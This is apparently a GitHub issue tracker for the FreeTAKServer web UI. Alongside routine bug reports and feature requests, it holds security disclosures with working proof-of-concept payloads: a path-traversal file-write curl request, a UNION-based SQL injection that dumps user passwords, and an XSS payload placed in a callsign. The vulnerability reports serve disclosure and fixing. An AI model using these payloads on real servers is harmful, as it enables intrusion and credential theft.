ui's People

Contributors

aalamsoft, brothercorvo, cypressxt, lennisthemenace, naman108, nir2602, oliviasculley, pinztrek, radioandrea, sivadinesh1

ui's Issues

Federation

the following methods need to be implemented

  • create federation (fixed with commit 7920319)
  • delete federation
  • change federation status

Provide specific HTML for common mis-configuration

“This has been explained many times before: you have the wrong IP in your configuration. Now if you don't know what an internal IP is the easiest way is to use a digital ocean install. In other case, read this forum and the docs.”

image

The message should be brief and provide a stable link into the documentation.

Catch and Report Connection Configuration Error

There are cases where the FTS-UI is misconfigured.
There is documentation explaining how to correct the configuration.
Cause the FTS-UI to catch the mis-configuration exception and direct the operator to the appropriate documentation.

Here is one such place where a connection exception is probably caused by such a mis-configuration:

  File "/root/fts.venv/lib/python3.11/site-packages/FreeTAKServer-UI/app/base/routes.py", line 42, in login
    user = requests.get(f"{app.config['PROTOCOL']}://{app.config['IP']}:{app.config['PORT']}/AuthenticateUser", params={"username": username, "password": password}, headers={"Authorization": f"{app.config['APIKEY']}"})

Force Password Change

[enhancement]
Might be a good 'nanny' feature to force admin password change on first login to UI.
I realize that one should just do it right away, but I can count 11+ servers out there in the wild that have left their default creds wide open presently.
Not sure if this belongs in the UI git or here. I can move it if need be.

Arbitrary File Write FreeTAKServer-UI (Remote Code Execution)

User Interface Datapackage

From the WebUI it is possible to (once logged in) upload DataPackages directly to the server so that it is possible to download the zipped files on the EUD in the field.
The route /DataPackageTable takes an argument ?filename= which is not sanitized for either the Path or the Filename outside of the UI, which creates the issue that you can place any file, anywhere on the system. Albeit going this route will add some junk XML data into the end of the file, thus making it extremely hard to achieve code execution through Python or Flask Templating.
This was achieved using a transparent proxy to catch and modify the web request, but can also be achieved using something like curl.

Proof Of Concept

Request through Burpsuite:
arbitrary-file-write_webui_request

File on system:
arbitrary-file-write_webui_tmp-file

(Note that the webserver is at that moment run as root, Not Recommended)

Bash equivalent PoC:

curl -i -s -k -X POST -H 'Host: atak.FreeTAKServer.com:19023' -H 'Authorization: Bearer ValidRestAPIToken' -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOUUxfHjKyflBjjhn' -H 'Accept-Encoding: gzip, deflate' --data-binary '------WebKitFormBoundaryOUUxfHjKyflBjjhn\x0d\x0aContent-Disposition: form-data; name=\"assetfile\"; filename=\"test.ext\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aThisIs FromDataPackageTable\x0d\x0a\x0d\x0a------WebKitFormBoundaryOUUxfHjKyflBjjhn--\x0d\x0a' 'http://atak.FreeTAKServer.com:19023/DataPackageTable?filename=../../../../../../../../tmp/file.ext&creator='
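Added example (not part of the original issue and not FreeTAKServer code): one way a server can turn a client-supplied `filename` value into a storage path without letting it leave the DataPackage directory. The function names, the storage directory and the shape of the naive join are assumptions made for illustration; the two file names are the ones from the report.

```python
import os
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath

# Values taken from the report above.
POC_FILENAME = "../../../../../../../../tmp/file.ext"
FORM_FILENAME = "test.ext"


class UnsafeFilename(ValueError):
    """The client-supplied name would not stay inside the storage directory."""


def naive_target(storage_dir, client_filename):
    """Assumed shape of the flaw: the query value is joined to the directory as-is."""
    return os.path.normpath(os.path.join(storage_dir, client_filename))


def resolve_upload_path(storage_dir, client_filename):
    """Return the absolute path for an upload, or raise UnsafeFilename."""
    name = client_filename.strip()
    if not name or name in (".", "..") or "\x00" in name:
        raise UnsafeFilename(f"rejected file name: {client_filename!r}")
    # A bare file name has no directory part under POSIX or Windows rules.
    if PurePosixPath(name).name != name or PureWindowsPath(name).name != name:
        raise UnsafeFilename(f"path components not allowed: {client_filename!r}")
    base = Path(storage_dir).resolve()
    target = (base / name).resolve()  # follows symlinks already present in base
    if os.path.commonpath([base, target]) != str(base):
        raise UnsafeFilename(f"escapes storage directory: {client_filename!r}")
    return target


def save_upload(storage_dir, client_filename, data):
    """Write the upload; "x" mode refuses to overwrite an existing file."""
    target = resolve_upload_path(storage_dir, client_filename)
    with open(target, "xb") as handle:
        handle.write(data)
    return target


def is_inside(storage_dir, path):
    """True when path resolves to a location under storage_dir."""
    base = str(Path(storage_dir).resolve())
    return os.path.commonpath([base, str(Path(path).resolve())]) == base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as storage:
        print("naive join  ->", naive_target(storage, POC_FILENAME))
        try:
            resolve_upload_path(storage, POC_FILENAME)
        except UnsafeFilename as exc:
            print("hardened    ->", exc)
        # Constructed sample content, written inside the temporary directory.
        print("normal name ->", save_upload(storage, FORM_FILENAME, b"constructed sample"))
```

Running the service as an unprivileged user, as the report's note recommends, limits what a write that slips past such a check can reach.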

can't use special characters

currently trying to create a user with a username or password that includes special characters will result in a failure to login.

TLS Based UI

Given the current security issues for authenticated users, we should add a default TLS option for users to prevent MITM and sniffing attacks.

Data Package text bug

I have a text bug on a fresh installation.

image

Package 1 is generated by the UI (created a FTSUser package to give right to access SSL)
Package 2 is uploaded from ATAK
As you can see, the name is unintelligible on the UI.
If I want to redownload the package from the server, the name is correctly written on the interface.

Support : Raspberry Pi 5 8GB
OS : Raspberry Pi OS (64-bit) / Debian Linux 12
Python: 3.11
FTS version : 2.1

Installation of FTServer was done following : https://freetakteam.github.io/FreeTAKServer-User-Docs/Installation/Linux/Service/
No customs modifications. Pip check FreeTAKServer resulted in "No broken requirements found."

UI Docker build for branch and merge pipelines

UI project will need to have a Dockerfile created.

In addition to getting the Dockerfile created and building valid images, GitHub actions will need to be created to build images on each push of a branch and merge to master.

Unable to Add or Delete files on Mission Page

FTS 2.1 RC1, UI 2.1

Clean install from ZTI. I am unable to add or delete files under the Data Package section. I can select a file to upload, but errors out saying 'Add Datapackage failed. Contact administrator'. If I try to delete a file, it says successful but the file remains.

[Feature Request] Web UI - Renaming Data Packages for better management

Currently the Web UI allows for adding and deleting data packages. As a server is used more, the number of data packages could increase significantly with data packages for general overlays, grgs, and specific mission plans, etc.

The ability to rename data packages would be beneficial to the ops/mission manager to ensure the data is sensibly ordered, and would benefit the client users when searching for the relevant dp to download.

/mission giving a error on excheck_json_data = excheck_json_data['data'][0]['contents']

I just succeeded in installing the FTS and UI and I see them via the browser 👍.
Thanks for your efforts on this system.

I'm bumping into an error page navigating to the /mission url.
I'm not sure if I did not configure correctly or something is wrong?

The code

The code looks as follows:
excheck_json_data = excheck_json_data['data'][0]['contents']

However the logs say that excheck_json_data looks like this:
{'ExCheck': {'Templates': [], 'Checklists': []}}

The error looks like this:

  File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/home/routes.py", line 69, in missionApi
    excheck_json_data = excheck_json_data['data'][0]['contents'],
KeyError: 'data'

Details of my setup:

Fresh install (Ubuntu on google cloud)
[FTS SERVER INFO]
FreeTAKServer-2.0.69

[UI SERVER INFO]
Version 2.1

[UP TIME]
1H 9M 17S

DP download name

when downloading a DataPackage the name of the download needs to be equivalent to that of the DataPackage, i.e. user downloads DataPackage hello.txt, datapackage name should be hello.txt

FTS update command overwrites config.py file

Running the FTS update command, <Pip install --upgrade freetakserver[UI]> results in overwriting of the user's config.py file and thus the loss of the user's customized settings for IP address assigned to FTS and FTS-UI.

  • Work around: User must reedit the config file (/root/fts.venv/lib/python3.11/site-packages/FreeTAKServer-UI/config.py) with their desired FTS IP address setting.

Ability to manage CA from UI

This would only reach as far as uploading your own certs, regenerating the current ones (with different settings like expiry time) or downloading them.

This would save people the need to SCP files onto the server

Calculation of uptime broken with UTC time set rather than local timezone

On my ubuntu 20.04 system, the FTS UI shows an incorrect negative uptime that obviously has UTC offset messing up the math.

My location is UTC-5, with the timezone on my system set to UTC I see the following output:

[UP TIME] [START TIME]
-5H -59M -24S 27/12/2021 23:12

Clearly one of the methods of accessing the time is using UTC and the other isn't.
The settings on Linux show:
:~$ timedatectl
Local time: Mon 2021-12-27 23:24:11 UTC
Universal time: Mon 2021-12-27 23:24:11 UTC
RTC time: Mon 2021-12-27 23:24:12
Time zone: UTC (UTC, +0000)
System clock synchronized: yes
NTP service: active
RTC in local TZ: no

If I set the timezone on my box to the actual local timezone for my system, the display is correct.

Convert setup.py to toml

Follow the footsteps of FTS core and update the current old setup.py to be managed in a modern toml.

This should allow the multiple requirements files to be removed.

SQL Injection on AuthenticateUser

The API endpoint /AuthenticateUser contains a SQL Injection into the SQLite3 Database that is handling the authentication process of the SystemUsers. In order to exploit this vulnerability the attacker needs to possess a valid API key, which can either be leaked through the XSS from an End User Device, or given as a part of the UAV Operator ability which broadcasts the GPS and Video feed of a UAV-Drone.
From the SQL Injection it is possible to list all the Username, UsedID and Clear-Text passwords in the database.

Proof of Concept

Posting the following snippet into a web browser's console will trigger the SQL Injection and return the name and password for each user in the SystemUsers table.

fetch("http://atak.FreeTAKServer.com:19023/AuthenticateUser?username=abc\" UNION SELECT (SELECT group_concat(name||':'||password) FROM SystemUser),'b','c','PASSWORD','d','e'--&password=PASSWORD", {
    "headers": {
      "accept": "*/*",
      "accept-language": "en-US,en;q=0.9",
      "authorization": "Bearer ValidAPIKey",
      "content-type": "application/json"
    },
    "mode": "cors"
  });

Will return the following response:
sqli_response

Which clearly shows the database results in clear-text.
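Added example (not part of the original issue and not FreeTAKServer code): the class of flaw reported above next to a hardened lookup that binds the username as a parameter and stores salted PBKDF2 hashes instead of clear-text passwords. The six-column table, the sample users, the function names and the shape of the unsafe query are constructed assumptions; the username value is the one from the report, with its quote character adapted to this example's query.

```python
import hashlib
import hmac
import os
import sqlite3

# Username value from the report's PoC; the quote after "abc" is adapted to the
# single-quoted query that authenticate_unsafe() builds below.
POC_USERNAME = ("abc' UNION SELECT (SELECT group_concat(name||':'||password) "
                "FROM SystemUser),'b','c','PASSWORD','d','e'--")
POC_PASSWORD = "PASSWORD"

# Constructed sample accounts.
SAMPLE_USERS = {"admin": "correct horse", "operator": "battery staple"}
PBKDF2_ROUNDS = 600_000


def hash_password(password, salt):
    """Salted PBKDF2-HMAC-SHA256 digest of the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db(users, hashed):
    """Constructed in-memory table; only `name` and `password` mirror the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE SystemUser (uid, name, token, password, salt, grp)")
    for uid, (name, password) in enumerate(users.items()):
        salt = os.urandom(16) if hashed else None
        stored = hash_password(password, salt) if hashed else password
        db.execute("INSERT INTO SystemUser VALUES (?, ?, ?, ?, ?, ?)",
                   (str(uid), name, "tok", stored, salt, "grp"))
    return db


def authenticate_unsafe(db, username, password):
    """Assumed shape of the flaw: the username is pasted into the SQL text."""
    query = f"SELECT * FROM SystemUser WHERE name = '{username}'"
    row = db.execute(query).fetchone()
    if row is not None and row[3] == password:
        return row[0]
    return None


def authenticate_safe(db, username, password):
    """Bind the username as data and compare hashes in constant time."""
    row = db.execute(
        "SELECT uid, password, salt FROM SystemUser WHERE name = ?",
        (username,),
    ).fetchone()
    if row is None:
        # Hash anyway so unknown and known users cost about the same time.
        hash_password(password, b"\x00" * 16)
        return None
    uid, stored, salt = row
    if hmac.compare_digest(stored, hash_password(password, salt)):
        return uid
    return None


if __name__ == "__main__":
    plain = make_db(SAMPLE_USERS, hashed=False)
    hardened = make_db(SAMPLE_USERS, hashed=True)
    print("unsafe, PoC input :", authenticate_unsafe(plain, POC_USERNAME, POC_PASSWORD))
    print("safe, PoC input   :", authenticate_safe(hardened, POC_USERNAME, POC_PASSWORD))
    print("safe, valid login :", authenticate_safe(hardened, "admin", "correct horse"))
```

With the bound parameter the whole PoC string is only ever compared against the `name` column, and the hashed table holds no clear-text passwords to disclose.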

[enhancement] Simple socket client for custom XML data on the FreeTAKServer

Hi, can we add a simple socket client feature to the connect page on the FreeTAKServer ?
Example use such as a user testing XML TCP posts to the server to see if their code is working also for testing behaviour by sending custom XML code.

Python Example:

import socket

UDP_IP = '10.0.0.60' #127.0.0.1
UDP_PORT = 8087 #5005
MESSAGE = '<?xml version="1.0"?><event version="2.0" uid="TestSign" type="a-f-G-U-C" how="m-g" start="2021-03-30T10:31:41.042Z" time="2021-03-30T17:31:41.042Z" stale="2021-03-30T17:37:56.042Z"><detail><contact callsign="TestSign"/><__group name="Blue" role="Team Lead" /></detail><point le="9999999.0" ce="5.0" hae="217.88824764640728" lon="-0.665562" lat="54.019611" /></event>'

# Create a socket (SOCK_STREAM means a TCP socket)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    # Connect to server and send data
    sock.connect((UDP_IP, UDP_PORT))
    sock.sendall(bytes(MESSAGE + "\n", "utf-8"))

    # Receive data from the server and shut down
    received = str(sock.recv(1024), "utf-8")
# Print and handle data how you want
print("Sent:     {}".format(MESSAGE))
print('\n')
print("Received: {}".format(received))

Features can be added as it grows and having this built in will add value to the user/testers experience.

Card Example:

Screenshot 2021-04-03 164650

Better configuration needed for UI code

The following comments are from a comment that I made on FreeTAKTeam/FreeTakServer#324. I went on a bit of a rant in that issue before I realized that I was going into a lot of things that did not pertain to the problem that FreeTAKTeam/FreeTakServer#324 was filed against (although there are some related items).

It has taken me a bit longer to make the time to create an issue concerning some of the things I was going off on and after contemplating where the problem is I think that most of the problem resides in the UI code. Hence this issue.

So from my comment in that issue:

So digging into the current code branches for FreeTAKServer and FreeTAKServer-UI it is mounting to the frustration level that there are 2 different methods for configuration. The two projects are closely related--why are there different configuration methods?

....

In FreeTAKServer it is configured by reading in a YAML file (/opt/FTSConfig.yaml) and there is no entry that appears to be equivalent to SECRET_KEY. So yes, this still seems to be a problem with the current code bases. Which begs the question of how the software ever made it to the point of release without full integration testing which should have caught the problem of missing config values.

Now, I may be missing something. I have only been working trying to get working copies of the software for a couple of hours. Forgive me if I am missing something. Yet given what I have seen thus far and problems that should not have made it to a release and complexities of configuring the software, I am compelled to give up and just run the official TAK server.

A bit of these comments are a little bit more specific to FreeTAKTeam/FreeTakServer#324, but I think it provides some of the context for this issue.

I should also state that I have submitted a PR (FreeTAKTeam/FreeTakServer#376) to rework the configuration module in the FreeTAKServer code and I am thinking that something similar should be done for the UI code.

The way that the UI code gets configured is to set all the values statically in a Python file that gets read in when the code starts up. While that is great for having the configuration already processed, it is really a bad experience for trying to run the code in different environments or if there needs to be a different configuration used on some occasion.

In my case I was trying to get the Docker version of FreeTAKServer running and having two different configuration mechanisms in the same Docker container is a bit of a nightmare. Actually, the existing Docker container does not seem to have any real configuration of the UI code that can be done.

I would suggest that the UI code be changed to read in a YAML file similar to the one used for FreeTAKServer. Actually the same config could/should be used. Since some of the values (specifically several of the network addressing settings) are used by both code bases it would make sense to use the same key values for both projects.

This would allow a single configuration file to be created and fed to both services (if they are running on different machines) or if both services are running in the Docker or similar environment then the configuration is just passed in once.

Port Forwarding option for UI

How can we adjust the port for the UI so we can access its fully use off the main system?

I would like to add/remove users from my connection on let's say my cellphone during times I'm not near my machine. And add/remove data packages on the Mission Screen.

Or if there is already a solution please advise.

As it stands this is basically a Read-Only access.

Thank you

[Feature Request] Web UI - User detail info page

Currently the Web UI displays the number of connected users only. A dedicated page to display user details would be beneficial to the ops/mission manager.

Callsign, Team, Role, User/certs, Last Known Time, Last Known Position, Battery Status, IP address, any other device details

Maybe instead of Team and Role, the icon similar to that seen in the client can be displayed.

The table would ideally have the ability to be ordered on the obvious columns like e.g. Callsign or Team.

A thorough and well implemented server; thanks guys.

UI unable to Connect FTAK Server

Yesterday I was experimenting with Free TAK Server in AWS, I currently have it setup so it is accessed by its public IP, I have setup the correct security group rules evidenced by the fact that I am able to connect from my Android Device App. The problem is with the UI, I am able to access and login with the default admin credentials however UI App is unable to communicate with the FTAK server.

Firefox Console reports a CORS issue, Chrome Console reports Connection Refused.

Just to be clear apps are running on same server and I used the first start wizard to setup.

I have experimented with the config.py currently I have:

# this IP will be used to connect with the FTS API
IP = 'Set as local IP Server is FTAK Running on'
# the public IP your server is exposing
APPIP = '0.0.0.0'

I think this may be the problem, where I have tried to set APPIP to the public IP I am using however I am unable to as I am unable to start the UI as I receive the following error:

File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/run.py", line 107, in <module>
    wsgi.server(sock = eventlet.listen((app_config.APPIP, app_config.APPPort)), site=app)
  File "/usr/local/lib/python3.8/dist-packages/eventlet/convenience.py", line 78, in listen
    sock.bind(addr)
OSError: [Errno 99] Cannot assign requested address

I'm hoping this is a bug and I've not missed something vital in the Documentation.

UI Feature Request: Connected Clients Dashboard

Would be real nice if there was a way to view connected clients and pertinent data about them in real-time.
Doesn't need to be as extensive as TAK Server, just some basics, such as call sign, TAK client version, and last report would be very useful.
Just for reference, the complete list that TAK Server shows is: Health, Callsign, Username, DN, Groups, Last Report, TAK client Version, Role, Team, IP address, Pending writes, Processed, Protocol, XPath, UID, Subscription. Again, not all of that is necessary, it's just what has been out there.
It appears that something like this was listed on the roadmap at 1.4.
A nice value-add would be if one of the fields was current location with a link to that PLI on the webmap.

UI in new builds inaccessible/can't login

All, I'm relatively new to the FTS configuration (have been working with the GOV version of TAK server for a while), and have been running into issues using the current version of the UI (1.8.1) in any new installations (Windows, Ubuntu, Debian) in either a VM instance or directly on physical machine (the Docker version works very well; however, it is based on FTS 1.7.5 which does not support the video features that my organization needs). I continue to encounter issues with the UI installation, which I will try to summarize (the documentation online is fragmented, which is understandable for such a project, and seems based on 1.7.5 FTS and 1.5.1 UI).

  1. WTforms does not seem to be properly called in the UI, which prevented the service from ever starting properly when calling run.py. (this was corrected by replacing all instances of "TextField" in /usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/base/forms.py with "StringField").
  2. After correcting the above and playing with the IP address fields in config.py and MainConfig.py, I was able to get the UI to start and display a login page. For the life of me, I can not figure if there is a valid user already created, or if there is a missed configuration item somewhere. Any attempt to login results in the following error:

`Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 159, in _new_conn
conn = connection.create_connection(
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 84, in create_connection
raise err
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 74, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.8/http/client.py", line 1252, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1298, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1247, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.8/http/client.py", line 1007, in _send_output
self.send(msg)
File "/usr/lib/python3.8/http/client.py", line 947, in send
self.connect()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 187, in connect
conn = self._new_conn()
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 171, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='0.0.0.0', port=19023): Max retries exceeded with url: /AuthenticateUser?username=admin&password=password (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/eventlet/wsgi.py", line 573, in handle_one_response
result = self.application(self.environ, start_response)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2464, in __call__
return self.wsgi_app(environ, start_response)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2450, in wsgi_app
response = self.handle_exception(e)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1867, in handle_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python3.8/dist-packages/flask/_compat.py", line 39, in reraise
raise value
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 2447, in wsgi_app
response = self.full_dispatch_request()
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1952, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1821, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/local/lib/python3.8/dist-packages/flask/_compat.py", line 39, in reraise
raise value
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1950, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/local/lib/python3.8/dist-packages/flask/app.py", line 1936, in dispatch_request
return self.view_functions[rule.endpoint](**req.view_args)
File "/usr/local/lib/python3.8/dist-packages/FreeTAKServer-UI/app/base/routes.py", line 42, in login
user = requests.get(f"http://{app.config['IP']}:{app.config['PORT']}/AuthenticateUser", params={"username": username, "password": password}, headers={"Authorization": f"{app.config['APIKEY']}"})
File "/usr/lib/python3/dist-packages/requests/api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 516, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='0.0.0.0', port=19023): Max retries exceeded with url: /AuthenticateUser?username=admin&password=password (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f9f51e83370>: Failed to establish a new connection: [Errno 111] Connection refused'))`

I am supporting a disaster response exercise in a few weeks and would like to have version 1.9.1.5 functional so that we can use the much-needed video streaming feature. Your insight and assistance would be appreciated.

XSS through Emergency Alert

In the FreeTAKServer-UI there is a function to create and view Emergency Alerts that are originating from either the End User Device or from the UI itself. Both Avenues are susceptible to a Stored Cross Site scripting vulnerability in the Callsign parameter.

Web Interface

In the case of a XSS in the WebUI it is as simple as having a callsign with the payload of <img src onerror=alert(/payload/)> which will trigger the Emergency function and display the emergency in the WebUI.

xss_webui_payload

xss_webui_alert

End User Device

What's more interesting of a scenario is that it is possible to push Emergencies from any of the EUDs, these can range from a 911, TIC (Troops in Contact) or similar.

This can be chained together with the API keys leakage in the response in order to obtain a server RestAPI key for further exploitation, which can take a normal user in the field to a Web Server admin

xss_enduserdevice_payload

xss_enduserdevice_webui_payload

xss_enduserdevice_alert

Release 1.9.8 reports the wrong version. It has 1.9.5 built in.

grep -r 1.9.5 UI-1.9.8/*
...
UI-1.9.8/FreeTAKServer-UI/app/init.py: app.config['UIVERSION'] = '1.9.5'
Binary file UI-1.9.8/FreeTAKServer-UI/tests/chromedriver matches
UI-1.9.8/setup.py: version='1.9.5',

The web application displays the incorrect version on the about screen as well.

[UI SERVER INFO]
Version 1.9.5
192.168.2.124:5000

Comments in the app/init.py file imply that the 1.9.5 is actually a database version number. It's very confusing to have the DB version displayed as the web UI code version - it seems like it's not right.

WebUI: Make WebUI docker- and reverse proxy- friendly

Currently, the WebUI doesn't seem to be very rproxy friendly. It needs to be told the IP for the API(?) in the environment variable IP. The UI then only connects back to this IP. As a consequence, the UI cannot be multihomed and it cannot be accessed through a reverse proxy. That makes life quite hard for admins who like to run FTS in a secure way in a docker environment behind a reverse proxy, even more so if it should handle SSL encryption.

Default login doesn't work

Finally figured out the config to get the Web UI not to throw errors at me. Now I'm trying to login with the default "admin" & "password" for the first login. It tells me "wrong user or password." I've looked inside FTSServer-UI.db and don't see ANY login information. I've been trying to look through the code on here to see where the initial username and password is set, but I can't find it. The output is:

(55296) wsgi starting up on http://192.168.50.XXX:5000
(55296) accepted ('192.168.50.XX', 2307)
(55296) accepted ('192.168.50.XX', 2308)
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET / HTTP/1.1" 302 406 0.009471
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /login HTTP/1.1" 200 10981 0.033868
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis.css?r=78 HTTP/1.1" 200 4815 0.002203
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis_red.css?r=92 HTTP/1.1" 200 4867 0.001406
(55296) accepted ('192.168.50.XX', 2309)
(55296) accepted ('192.168.50.XX', 2310)
192.168.50.XX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/jarvis_grey.css?r=2 HTTP/1.1" 200 4917 0.001352
192.168.50.XXX - - [12/Sep/2022 11:58:09] "GET /static/assets/css/global.css?r=94 HTTP/1.1" 200 23760 0.001249
Starting new HTTP connection (1): 192.168.50.XXX:8080
http://192.168.50.XXX:8080 "GET /AuthenticateUser?username=admin&password=password HTTP/1.1" 404 232
192.168.50.XX - - [12/Sep/2022 11:58:13] "POST /login HTTP/1.1" 200 10874 0.012816
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis_red.css?r=49 HTTP/1.1" 200 4867 0.001497
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis.css?r=12 HTTP/1.1" 200 4815 0.001263
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/global.css?r=8 HTTP/1.1" 200 23760 0.001427
192.168.50.XX - - [12/Sep/2022 11:58:13] "GET /static/assets/css/jarvis_grey.css?r=98 HTTP/1.1" 200 4917 0.001757

XX is the client and XXX is the server. I am using it unsecure (for now). I installed from pip using the latest release.

Update code to allow deps upgrade

Flask, wtforms, and sqlalchemy are capped due to some deprecated functions.

Update code to play nice with the replacements and allow us to use modern versions.

Tasks

No tasks being tracked yet.

ExCheck

excheck multiple select doesn't work
excheck add template needs to be implemented
excheck delete template needs to be implemented

[Bug] FreeTAKServer register page bugs

Hi,
I noticed a small bug where when the exception for a user which exists is triggered the left navigation drawer menu is exposed with clickable buttons.

Also when attempting to create an account on the FreeTAKServer, clicking the register button presents what looks like a SQL error. See the images below:

User exists bug:

113354798-fe15db00-933f-11eb-9d4a-ffe4723a5f87

Create an account error:

113354812-040bbc00-9340-11eb-9a8c-146bfb6d0faa

Configurable Logs

Would be most excellent if the LOGS feature on the /index page of the UI was working, and was configurable to filter, sort, or identify event types, time stamps, and logins.
Example event types I would be most interested in would be user (EUD) connections and admin (UI) connections. Any admin type events in the UI would be nice, such as created/deleted-data-package, created/deleted-user, enabled/disabled mission, enabled/disabled TCP & HTTP-DP, etc.

API and Websocket Keys Leakage

The WebUI leaks the RestAPI and Websocket tokens in the javascript source code! These should not be reflected back to the user as that can lead to unintended requests through for example XSS.

API Bearer Token

SourceCode_RestAPI-key

Websocket Token

SourceCode_WebSocket-key
